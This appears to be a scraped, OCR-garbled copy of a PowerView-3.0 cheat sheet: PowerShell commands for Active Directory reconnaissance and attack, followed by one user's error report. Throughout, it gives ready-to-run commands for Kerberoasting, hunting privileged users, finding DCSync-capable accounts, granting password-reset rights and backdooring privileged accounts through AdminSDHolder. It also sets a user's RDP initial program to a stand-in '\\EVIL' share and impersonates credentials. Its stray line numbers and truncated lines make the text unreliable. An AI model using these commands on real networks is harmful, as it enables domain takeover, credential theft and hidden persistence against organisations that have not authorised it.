

PowerView-3.0 tips and tricks

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    ○ PowerView-3.0-tricks.ps1

                                                                                                                                  Raw
       # PowerView's last major overhaul is detailed here: http://www.harmj@y.net/blog/powershell/make-powerview-great-again/
           tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
   3
       # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
           https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
   6
       # New function naming schema:
   8
           Verbs:
   9
               Get : retrieve full raw data sets
               Find : 'find' specific data entries in a data set
  10
  11
               Add: add a new object to a destination
               Set : modify a given object
               Invoke : lazy catch-all
  13
           Nouns:
  14
               Verb-Domain*: indicates that LDAP/.NET querying methods are being executed
               Verb-WMI*: indicates that WMI is being used under the hood to execute enumeration
  16
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17
            Verb-Net*: indicates that Win32 API access is being used under the hood
18
19
     # get all the groups a user is effectively a member of, 'recursing up' using tokenGroups
20
     Get-DomainGroup -MemberIdentity <User/Group>
22
     # get all the effective members of a group, 'recursing down'
23
     Get-DomainGroupMember -Identity "Domain Admins" -Recurse
24
25
    # use an alterate creadential for any function
     $SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
27
     $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
     Get-DomainUser -Credential $Cred
29
    # retrieve all the computer dns host names a GPP password applies to
     Get-DomainOU -GPLink '<GPP_GUID>' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname}
    # get all users with passwords changed > 1 year ago, returning sam account names and password last set times
     $Date = (Get-Date).AddYears(-1).ToFileTime()
     Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname, pwdlastset</pre>
    # all enabled users, returning distinguishednames
     Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname
     Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname
40
41
    # all disabled users
    Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)"
    Get-DomainUser - UACFilter ACCOUNTDISABLE
45
    # all users that require smart card authentication
46
     Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)"
     Get-DomainUser -UACFilter SMARTCARD_REQUIRED
48
49
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# all users that *don't* require smart card authentication, only returning sam account names
    Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname
     Get-DomainUser - UACFilter NOT_SMARTCARD_REQUIRED - Properties samaccountname
     # use multiple identity types for any *-Domain* function
     'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','d
56
    # find all users with an SPN set (likely service accounts)
57
     Get-DomainUser -SPN
59
    # check for users who don't have kerberos preauthentication set
     Get-DomainUser -PreauthNotRequired
     Get-DomainUser -UACFilter DONT_REQ_PREAUTH
63
    # find all service accounts in "Domain Admins"
64
    Get-DomainUser -SPN | ?{$_.memberof -match 'Domain Admins'}
65
66
    # find users with sidHistory set
67
    Get-DomainUser -LDAPFilter '(sidHistory=*)'
69
    # find any users/computers with constrained delegation st
71
     Get-DomainUser -TrustedToAuth
    Get-DomainComputer -TrustedToAuth
72
73
    # enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation.
74
     $Computers = Get-DomainComputer -Unconstrained
     $Users = Get-DomainUser -AllowDelegation -AdminCount
77
    # return the local *groups* of a remote server
79
     Get-NetLocalGroup SERVER.domain.local
80
    # return the local group *members* of a remote server using Win32 API methods (faster but less info)
81
    Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local
```

```
83
     # Kerberoast any users in a particular OU with SPNs set
84
     Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"
85
86
     # Find-DomainUserLocation == old Invoke-UserHunter
     # enumerate servers that allow unconstrained Kerberos delegation and show all users logged in
      Find-DomainUserLocation -ComputerUnconstrained -ShowAll
89
     # hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation
      Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
     # find all computers in a given OU
94
     Get-DomainComputer -SearchBase "ldap://OU=..."
     # Get the logged on users for all machines in any *server* OU in a particular domain
97
     Get-DomainOU -Identity *server* -Domain <domain> | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname
     # enumerate all gobal catalogs in the forest
100
     Get-ForestGlobalCatalog
101
     # turn a list of computer short names to FQDNs, using a global catalog
     gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname}
104
105
     # enumerate the current domain controller policy
106
     $DCPolicy = Get-DomainPolicy -Policy DC
107
     $DCPolicy.PrivilegeRights # user privilege rights on the dc...
108
109
110
     # enumerate the current domain policy
     $DomainPolicy = Get-DomainPolicy -Policy Domain
111
112
      $DomainPolicy.KerberosPolicy # useful for golden tickets ;)
113
     $DomainPolicy.SystemAccess # password age/etc.
114
115
     # enumerate what machines that a particular user/group identity has local admin rights to
```

```
Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation
116
     Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>
117
118
119
      # enumerate what machines that a given user in the specified domain has RDP access rights to
120
     Get-DomainGPOUserLocalGroupMapping -Identity <USER> -Domain <DOMAIN> -LocalGroup RDP
121
122
      # export a csv of all GPO mappings
     Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv
123
124
     # use alternate credentials for searching for files on the domain
125
     # Find-InterestingDomainShareFile == old Invoke-FileFinder
126
     $Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force
127
128
     $Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user", $Password)
      Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential
129
130
     # enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names
     Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local
132
133
134
     # grant user 'will' the rights to change 'matt's password
     Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose
137
      # audit the permissions of AdminSDHolder, resolving GUIDs
     Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder, CN=System, DC=testlab, DC=local' -ResolveGUIDs
138
139
      # backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
140
     Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder, CN=System, DC=testlab, DC=local' -PrincipalIdentity matt -Rights All
141
142
143
     # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
     Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
144
145
          ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
146
     }
147
     # find linked DA accounts using name correlation
```

```
Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.spli
149
      # save a PowerView object to disk for later usage
151
152
      Get-DomainUser | Export-Clixml user.xml
153
      $Users = Import-Clixml user.xml
154
155
      # Find any machine accounts in privileged groups
      Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}
156
157
      # Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights
158
      Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{$
159
      # find all policies applied to a current machine
161
162
      Get-DomainGPO -ComputerIdentity windows1.testlab.local
163
      # enumerate all groups in a domain that don't have a global scope, returning just group names
164
      Get-DomainGroup -GroupScope NotGlobal -Properties name
165
166
      # enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships
167
         query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames
      $ForeignUsers = Get-DomainObject -Properties objectsid, distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectcl
170
      Domains = 0{}
      $ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) {
171
172
         # extract the domain the foreign user was added to
         $ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
173
174
         # check if we've already enumerated this domain
175
         if (-not $Domains[$ForeignUserDomain]) {
176
             $Domains[$ForeignUserDomain] = $True
             # enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set
177
178
             $Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))"
179
             Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname, member
180
         }
181 }
```

```
$ForeignMemberships | fl
     # if running in -sta mode, impersonate another credential a la "runas /netonly"
184
     $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
185
     $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
186
     Invoke-UserImpersonation -Credential $Cred
187
     # ... action
188
     Invoke-RevertToSelf
189
190
     # enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned
191
     Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier
192
193
     # set the specified property for the given user identity
194
     Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
195
196
     # Set the owner of 'dfm' in the current domain to 'harmj@y'
     Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
198
199
     # retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
200
     Get-ObjectACL "DC=testlab, DC=local" -ResolveGUIDs | ? {
201
         ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')
203
     }
204
     # check if any user passwords are set
205
     $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname, memberof, userPassword | % {A
206
```



scerazy commented 8 days ago

• • •

| Get-DomainGroupMember -Recurse | ?{\$_.MemberName -like '*\$'}

does not seem to work.

Get-DomainSearcher: A parameter cannot be found that matches parameter name 'Identity'. At C:\PSScripts\PowerView.ps1:11098 char:45

•

\$GroupSearcher = Get-DomainSearcher @SearcherArguments

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- o CategoryInfo : InvalidArgument: (:) [Get-DomainSearcher], ParameterBindingException
  - FullyQualifiedErrorld : NamedParameterNotFound,Get-DomainSearcher

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